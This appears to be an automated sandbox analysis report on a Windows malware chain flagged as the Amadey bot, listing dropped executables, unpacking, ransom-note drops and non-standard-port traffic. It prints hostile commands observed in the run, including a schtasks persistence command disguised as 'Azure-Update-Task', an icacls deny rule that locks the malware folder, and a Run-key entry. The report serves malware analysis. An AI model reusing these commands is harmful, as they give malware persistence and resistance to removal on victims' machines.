Source: F86F.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: 40.0.D5B9.exe.b30000.0.unpack, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Command line argument: U/A

5_2_00405380

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6000.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6000.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\D5B9.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: TEST_mi_exe_stub.pdb source: 6C74.exe, 00000018.00000003.487043916.0000000003170000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\lid.pdb source: file.exe, 00000000.00000000.352517490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, rrjthgj, 00000004.00000000.435807924.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: XVC:\lid.pdb source: file.exe, 00000000.00000000.352517490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, rrjthgj, 00000004.00000000.435807924.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378976000.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\jegeg\fuvimum\72 medu.pdb source: C2B9.exe, 00000013.00000000.453422827.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\felisupitazaz\tabeg\poriyo-zu.pdb source: explorer.exe, 00000001.00000003.445200516.00000000059E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.437889073.00000000059E3000.00000004.00000001.00020000.00000000.sdmp, 759F.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 6.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 12.2.6C74.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 14.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 17.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Unpacked PE file: 23.2.AF5C.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 24.2.6C74.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Unpacked PE file: 26.2.9B15.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Unpacked PE file: 27.2.86ED.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Unpacked PE file: 29.2.E8B1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 32.2.759F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Unpacked PE file: 33.2.6000.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Unpacked PE file: 38.2.build2.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rrjthgj	Unpacked PE file: 4.2.rrjthgj.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 6.2.759F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 12.2.6C74.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 14.2.759F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Unpacked PE file: 17.2.759F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\C2B9.exe	Unpacked PE file: 19.2.C2B9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Unpacked PE file: 23.2.AF5C.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Unpacked PE file: 24.2.6C74.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Unpacked PE file: 26.2.9B15.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Unpacked PE file: 27.2.86ED.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Unpacked PE file: 29.2.E8B1.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Unpacked PE file: 32.2.759F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Unpacked PE file: 33.2.6000.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Unpacked PE file: 38.2.build2.exe.400000.0.unpack .text:ER;.data:W;.wida:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004156DC push esp; iretd	0_2_004156DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040912D push ecx; ret	0_2_00409140
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_0040912D push ecx; ret	4_2_00409140
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_01FED67D push 6700D42Eh; retf	4_2_01FED687
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_01FEC825 push 623D8A45h; retf	4_2_01FEC82A
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00409924 push ecx; ret	5_2_00409937
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0040E1F9 push ecx; ret	5_2_0040E20C
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00404A30 push ecx; mov dword ptr [esp], 00000000h	5_2_00404A31
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00404DF0 push ecx; mov dword ptr [esp], 00000000h	5_2_00404DF1
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_0230308F push ecx; retf	5_2_02303092

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_00404E80 LoadLibraryW,GetProcAddress,VirtualProtect,

5_2_00404E80

Source: build2.exe.24.dr	Static PE information: section name: .wida
Source: build2[1].exe.24.dr	Static PE information: section name: .wida
Source: XandETC.exe.40.dr	Static PE information: section name: .xdata

Source: build3.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6
Source: mstsca.exe.35.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6
Source: aafg31.exe.40.dr	Static PE information: real checksum: 0x6919a should be: 0x729aa
Source: D5B9.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x460921
Source: build3[1].exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6
Source: oldplayer.exe.40.dr	Static PE information: real checksum: 0x0 should be: 0x401eb
Source: F86F.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x460921

Source: initial sample	Static PE information: section name: .text entropy: 7.591220711229014
Source: initial sample	Static PE information: section name: .text entropy: 7.9699770446532385
Source: initial sample	Static PE information: section name: .text entropy: 7.893754755446736
Source: initial sample	Static PE information: section name: .text entropy: 7.893754755446736
Source: initial sample	Static PE information: section name: .text entropy: 7.893754755446736
Source: initial sample	Static PE information: section name: .text entropy: 7.59013254803942
Source: initial sample	Static PE information: section name: .text entropy: 7.9699770446532385
Source: initial sample	Static PE information: section name: .text entropy: 7.9699770446532385
Source: initial sample	Static PE information: section name: .text entropy: 7.9699770446532385
Source: initial sample	Static PE information: section name: .text entropy: 7.59013254803942
Source: initial sample	Static PE information: section name: .text entropy: 7.9699770446532385
Source: initial sample	Static PE information: section name: .text entropy: 7.931396029867796
Source: initial sample	Static PE information: section name: .text entropy: 7.893754755446736
Source: initial sample	Static PE information: section name: .text entropy: 7.59013254803942
Source: initial sample	Static PE information: section name: .text entropy: 7.591220711229014
Source: initial sample	Static PE information: section name: .text entropy: 7.59013254803942
Source: initial sample	Static PE information: section name: .text entropy: 7.893754755446736

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match

File source: dump.pcap, type: PCAP

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rrjthgj			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wujthgj			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\759F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E8B1.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C2B9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\Downloads\ChromeSetup.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D5B9.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\11.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rrjthgj	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wujthgj	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\86ED.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F86F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\DF46.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E9C7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6000.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F09E.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\Downloads\ChromeSetup.exe.bhui (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\759F.exe	File created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\AF5C.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6C74.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	File created: C:\Users\user\AppData\Local\Temp\aafg31.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	File created: C:\Users\user\AppData\Local\Temp\XandETC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9B15.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	File created: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\67F2.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	File created: C:\Users\user\_readme.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 22022
Source: unknown	Network traffic detected: HTTP traffic on port 22022 -> 49780

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\rrjthgj:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\wujthgj:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\AppData\Local\Temp\D5B9.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process information set: NOOPENFILEERRORBOX
